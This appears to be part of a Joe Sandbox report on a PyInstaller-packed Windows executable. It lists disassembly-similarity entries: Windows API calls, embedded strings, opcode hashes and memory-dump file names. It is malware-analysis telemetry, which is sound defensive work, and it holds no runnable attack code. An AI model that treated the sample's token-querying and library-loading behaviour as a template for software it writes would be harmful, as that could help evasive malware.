• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
• Instruction ID: e98e819fe2ce1434beeb0ac5b42c514262c9ecf84b4bfa8ba7c5d7c68db00640
• Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
• Instruction Fuzzy Hash: 0F81AFA0E0E247C6FA67AB75D4C12796E90AF56780F544035DF0C57BB6DE3CE9468B00
APIs
Memory Dump Source
• Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
• Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
• Instruction ID: 8be528e4e204b13d71ed9177a4f1a1ccb764ec7a586de06b95fe44c46117d0c6
• Opcode Fuzzy Hash: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
• Instruction Fuzzy Hash: B081BEE0E4E64385F652AB3DDC412F966B6AFA5F80F486434DE0DD7696DE3CE8418E00
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: d6145e58236951280cdc39b865d6008e905f2ee23aaf1e4de42334ebbbf37fb7
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 4B127061E0824386FB227A15F954279F6B3FB60764FE4813DE68A466C4DF7CE5808F21
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 808a7fa6049103a88b91e57bc9f78050900597928f8c3b4ea897a958b3d5c613
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: 17127461E0C14386FB21BA15EC54679F6B3FBA0764FE44039D69A47AC4DB7CE4808F60
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
• Instruction ID: f313f5aa19bce955fab23999e56595ac6e7fc054a09b00b6304cdae7fab1f308
• Opcode Fuzzy Hash: 7353426b42f42a82694b3592670e666301d967352ad9965b6266ed7fbff1557c
• Instruction Fuzzy Hash: CD41B521B0865381EA12FB129C016B9F396FFA4BE4FE44931EE0C07785DE3CE5458B60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,00000000,00007FF72C653CBB), ref: 00007FF72C658704
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65870A
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65874C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: GetEnvironmentVariableW.KERNEL32(00007FF72C65388E), ref: 00007FF72C658867
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72C658889
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C668238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C668251
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                  • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                  • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                  • Instruction ID: ccd400955c279738c84ebd1a9837a2eb1e4600d8e859cc44b92fd759b3684798
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35419011A1964244EA13FB619C552B9A253FFA97E0FE00535EE0D47ADADE3CE805CF60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                  • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction ID: cf1b7d9260b1dd337f322538d9dc9c3f42fb4c4a0a2055fb6799c411062e17d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D18232A0878186EB21AB65D9803ADB7A2FB657E8F600135DF4D57795DF3CE081CB11
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,00000237A2949838,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,00000237A2949838,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE98
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                  • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction ID: 4bc6771c35aad53dbe7e34b14185a0abb63c90f1c0af2297e5558ee2b09d60af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8841E62171964282EA17AB569C04575B2A2FF65BB0FE84539DD1D47784EE3CE40A8A20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ioctl
                                                                                                                                                                                                                                  • String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
                                                                                                                                                                                                                                  • API String ID: 3041054344-4238462244
                                                                                                                                                                                                                                  • Opcode ID: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                                  • Instruction ID: 0c08d6b7f83ad4bf11768eb1f32ffa51f4d8eb1fd6171cdfc8422d81b62dc114
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB516AB1A19A41C9F761CB70E8C05ADB3B8FB48744F540232EE5E93A68DF38D565C760
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF72C652D99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                  • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                  • API String ID: 3940978338-251083826
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
• API String ID: 0-1087561517
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
• API String ID: 0-2528746747
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
Similarity
• API ID: 00007
• String ID: Invalid compression preset: %u$Invalid filter specifier for LZMA filter$preset$|OOO&O&O&O&O&O&O&O&
• API String ID: 3568877910-1461672608
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD4D
• GetLastError.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD5B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD85
• FreeLibrary.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDF3
• GetProcAddress.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDFF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
APIs
• GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72C65351A,?,00000000,00007FF72C653F23), ref: 00007FF72C652AA0
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-2900015858
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction ID: 4e9efa4256274eaa79a19353c0f60a9e941a94e07aa51b5e515e7b0f6c095f0c
• Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
• Instruction Fuzzy Hash: F7212521A0C64241EB51AB55B94423AE3A2FFD57F4FA00235E66D43AD4DE7CD4458F10
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
• Instruction ID: 22c0e5db78f66657727efbb6fbc4989aea53d76814ed5388e91f011f0e5ee254
• Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
• Instruction Fuzzy Hash: AC219024B0C24381F95A73619E51239F163FFA47B0FA04738E87E066C6DE2DA4405F21
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: getservbyporthtons
• String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
• API String ID: 3477891686-2618607128
• Opcode ID: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
• Instruction ID: 014e982c961c795e16b712647bae1d47882afeb9221e759f90f647a8d1a0a021
• Opcode Fuzzy Hash: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
• Instruction Fuzzy Hash: AA21F1A1A0AA03C1EA128B35E4C467D7379FB85B85F540071EE4E47679DF3ED06AC720
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction ID: c1cab2659841ab4b17ec5aefbb1dc03c87c7df249e3fecf0500bc6ca7902e583
• Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
• Instruction Fuzzy Hash: 6D119631B18A4286E751AB52FC55339A3A1FBA8BF4F400734DA5D877A4DF3CD4588B50
APIs
• GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658EFD
• K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658F5A
  • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C658FE5
• K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659044
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C659055
• FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72C653FB1), ref: 00007FF72C65906A
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
• String ID:
• API String ID: 3462794448-0
• Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
• Instruction ID: 45aa486cb43e8da2c99fb29abee3855fa73dab5e373ef8af8e499d9eca07cd38
• Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
• Instruction Fuzzy Hash: B341D662A1968281EA31AB11AC003BAB396FF99BE4F940539DF4D57789DF3DD501CF20
APIs
  • Part of subcall function 00007FF72C658570: GetCurrentProcess.KERNEL32 ref: 00007FF72C658590
  • Part of subcall function 00007FF72C658570: OpenProcessToken.ADVAPI32 ref: 00007FF72C6585A3
  • Part of subcall function 00007FF72C658570: GetTokenInformation.ADVAPI32 ref: 00007FF72C6585C8
  • Part of subcall function 00007FF72C658570: GetLastError.KERNEL32 ref: 00007FF72C6585D2
  • Part of subcall function 00007FF72C658570: GetTokenInformation.ADVAPI32 ref: 00007FF72C658612
  • Part of subcall function 00007FF72C658570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72C65862E
  • Part of subcall function 00007FF72C658570: CloseHandle.KERNEL32 ref: 00007FF72C658646
• LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C65916C
• LocalFree.KERNEL32(?,00007FF72C653C55), ref: 00007FF72C659175
Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
